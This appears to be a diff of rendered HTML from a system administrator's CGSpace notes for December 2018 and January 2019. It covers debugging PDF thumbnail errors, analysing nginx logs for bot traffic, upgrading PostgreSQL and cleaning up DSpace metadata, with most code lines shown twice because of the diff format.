<pre><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
at org.im4java.core.Info.getBaseInfo(Info.java:342)
... 14 more
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
@ -265,31 +265,31 @@ Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `
</code></pre><ul>
<li>And on my Arch Linux environment ImageMagick&rsquo;s <code>convert</code> also segfaults:</li>
</ul>
<pre><code>$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
<pre tabindex="0"><code>$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
zsh: abort (core dumped) convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] x60
</code></pre><ul>
<li>But GraphicsMagick&rsquo;s <code>convert</code> works:</li>
</ul>
<pre><code>$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
<pre tabindex="0"><code>$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
</code></pre><ul>
<li>So far the only thing that stands out is that the two files that don&rsquo;t work were created with Microsoft Office 2016:</li>
</ul>
<pre><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
</code></pre><ul>
<li>And the one that works was created with Office 365:</li>
</ul>
<pre><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word for Office 365
Producer: Microsoft® Word for Office 365
</code></pre><ul>
<li>I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:</li>
</ul>
<pre><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png=&#39;cover.png&#39;
$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li>I&rsquo;ve tried a few times this week to register for the <a href="https://www.evisa.gov.et/">Ethiopian eVisa website</a>, but it is never successful</li>
@ -304,7 +304,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</ul>
</li>
</ul>
<pre><code>2018-12-03 15:44:00,030 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
<pre tabindex="0"><code>2018-12-03 15:44:00,030 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
2018-12-03 15:44:03,390 ERROR com.atmire.app.webui.servlet.ExportServlet @ Error converter plugin not found: interface org.infoCon.ConverterPlugin
...
2018-12-03 15:45:01,667 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-listing-and-reports not found
@ -312,7 +312,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<li>I tested it on my local environment with Tomcat 8.5.34 and the JSPUI application still has an error (again, the logs show something about tag cloud, so it may be unrelated), and the Listings and Reports still asks you to log in again, despite already being logged in in XMLUI, but does appear to work (I generated a report and exported a PDF)</li>
<li>I think the errors about missing Atmire components must be important, as they appear here on my local machine as well (though not the one about atmire-listings-and-reports):</li>
</ul>
<pre><code>2018-12-03 16:44:00,009 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
<pre tabindex="0"><code>2018-12-03 16:44:00,009 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
</code></pre><ul>
<li>This has got to be part Ubuntu Tomcat packaging, and part DSpace 5.x Tomcat 8.5 readiness&hellip;?</li>
</ul>
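<ul>
<li>A quick way to check (a sketch; the DSpace installation path will differ) is to see whether those Atmire module configuration files exist at all under <code>config/modules</code>:</li>
</ul>
<pre tabindex="0"><code>$ ls -1 ~/dspace/config/modules/ | grep -i atmire
</code></pre>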
@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<ul>
<li>Last night Linode sent a message that the load on CGSpace (linode18) was too high, here&rsquo;s a list of the top users at the time and throughout the day:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018:1(5|6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018:1(5|6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
225 40.77.167.142
226 66.249.64.63
232 46.101.86.248
@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
962 66.249.70.27
1193 35.237.175.180
1450 2a01:4f8:140:3192::2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1141 207.46.13.57
1299 197.210.168.174
1341 54.70.40.11
@ -345,32 +345,32 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li><code>35.237.175.180</code> is known to us (CCAFS?), and I&rsquo;ve already added it to the list of bot IPs in nginx, which appears to be working:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03
4772
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
630
</code></pre><ul>
<li>I haven&rsquo;t seen <code>2a01:4f8:140:3192::2</code> before. Its user agent is some new bot:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
</code></pre><ul>
<li>At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03
5111
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
419
</code></pre><ul>
<li><code>78.46.79.71</code> is another host on Hetzner with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>This is not the first time a host on Hetzner has used a &ldquo;normal&rdquo; user agent to make thousands of requests</li>
<li>At least it is re-using its Tomcat sessions somehow:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03
2044
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>In other news, it&rsquo;s good to see my re-work of the database connectivity in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> actually caused a reduction of persistent database connections (from 1 to 0, but still!):</li>
@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<li>Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night</li>
<li>I looked in the logs and there&rsquo;s nothing particular going on:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1225 157.55.39.177
1240 207.46.13.12
1261 207.46.13.101
@ -399,13 +399,13 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
</code></pre><ul>
<li><code>54.70.40.11</code> is some new bot with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
</code></pre><ul>
<li>But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05
6980
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05 | sort | uniq | wc -l
1156
</code></pre><ul>
<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> appears to be the CKM dev server where Danny is testing harvesting via Drupal</li>
@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<li>Linode alerted me twice today that the load on CGSpace (linode18) was very high</li>
<li>Looking at the nginx logs I see a few new IPs in the top 10:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;17/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;17/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
927 157.55.39.81
975 54.70.40.11
2090 50.116.102.77
@ -460,7 +460,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
</code></pre><ul>
<li><code>94.71.244.172</code> and <code>143.233.227.216</code> are both in Greece and use the following user agent:</li>
</ul>
<pre><code>Mozilla/3.0 (compatible; Indy Library)
<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
</code></pre><ul>
<li>I see that I added this bot to the Tomcat Crawler Session Manager valve in 2017-12 so its XMLUI sessions are getting re-used</li>
<li><code>2a01:4f8:173:1e85::2</code> is some new bot called <code>BLEXBot/1.0</code> which should be matching the existing &ldquo;bot&rdquo; pattern in the Tomcat Crawler Session Manager regex</li>
@ -477,7 +477,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<ul>
<li>Testing compression of PostgreSQL backups with xz and gzip:</li>
</ul>
<pre><code>$ time xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz
<pre tabindex="0"><code>$ time xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz
xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz 48.29s user 0.19s system 99% cpu 48.579 total
$ time gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz
gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz 2.78s user 0.09s system 99% cpu 2.899 total
@ -492,7 +492,7 @@ $ ls -lh cgspace_2018-12-19.backup*
<li>Peter asked if we could create a controlled vocabulary for publishers (<code>dc.publisher</code>)</li>
<li>I see we have about 3500 distinct publishers:</li>
</ul>
<pre><code># SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
<pre tabindex="0"><code># SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
count
-------
3522
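-- (sketch) export the distinct publishers for review, reusing the \COPY pattern from the AGROVOC subject export above; the output path is just an example
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39 GROUP BY text_value ORDER BY count DESC) to /tmp/publishers.csv WITH CSV HEADER;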
@ -501,17 +501,17 @@ $ ls -lh cgspace_2018-12-19.backup*
<li>I reverted the metadata changes related to &ldquo;Unrestricted Access&rdquo; and &ldquo;Restricted Access&rdquo; on DSpace Test because we&rsquo;re not pushing forward with the new status terms for now</li>
<li>Purge remaining Oracle Java 8 stuff from CGSpace (linode18) since we migrated to OpenJDK a few months ago:</li>
</ul>
<pre><code># dpkg -P oracle-java8-installer oracle-java8-set-default
<pre tabindex="0"><code># dpkg -P oracle-java8-installer oracle-java8-set-default
</code></pre><ul>
<li>Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p &#39;fuu&#39; -d
Connected to database.
Fixed 466 occurences of: Copyrighted; Any re-use allowed
</code></pre><ul>
<li>Upgrade PostgreSQL on CGSpace (linode18) from 9.5 to 9.6:</li>
</ul>
<pre><code># apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
<pre tabindex="0"><code># apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
# pg_ctlcluster 9.5 main stop
# tar -cvzpf var-lib-postgresql-9.5.tar.gz /var/lib/postgresql/9.5
# tar -cvzpf etc-postgresql-9.5.tar.gz /etc/postgresql/9.5
@ -519,22 +519,22 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
# pg_dropcluster 9.6 main
# pg_upgradecluster 9.5 main
# pg_dropcluster 9.5 main
# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.5 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>I&rsquo;ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments</li>
<li>Run all system updates on CGSpace (linode18) and restart the server</li>
<li>Try to run the DSpace cleanup script on CGSpace (linode18), but I get some errors about foreign key constraints:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
- Deleting bitstream information (ID: 158227)
- Deleting bitstream record from database (ID: 158227)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(158227) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(158227) is still referenced from table &#34;bundle&#34;.
...
</code></pre><ul>
<li>As always, the solution is to delete those IDs manually in PostgreSQL:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);&#39;
UPDATE 1
</code></pre><ul>
<li>After all that I started a full Discovery reindex to get the index name changes and rights updates</li>
@ -544,7 +544,7 @@ UPDATE 1
<li>CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat</li>
<li>The top IP addresses as of this evening are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
963 40.77.167.152
987 35.237.175.180
1062 40.77.167.55
@ -558,7 +558,7 @@ UPDATE 1
</code></pre><ul>
<li>And just around the time of the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &quot;29/Dec/2018:1(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &#34;29/Dec/2018:1(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
115 66.249.66.223
118 207.46.13.14
123 34.218.226.147
@ -594,15 +594,15 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -12,7 +12,7 @@
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -27,7 +27,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-01/" />
<meta property="article:published_time" content="2019-01-02T09:48:30+02:00" />
<meta property="article:modified_time" content="2020-10-19T15:23:30+03:00" />
<meta property="article:modified_time" content="2022-03-22T22:03:59+03:00" />
@ -38,7 +38,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,7 +62,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
"url": "https://alanorth.github.io/cgspace-notes/2019-01/",
"wordCount": "5531",
"datePublished": "2019-01-02T09:48:30+02:00",
"dateModified": "2020-10-19T15:23:30+03:00",
"dateModified": "2022-03-22T22:03:59+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -80,12 +80,12 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -131,7 +131,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<p class="blog-post-meta">
<time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time>
in
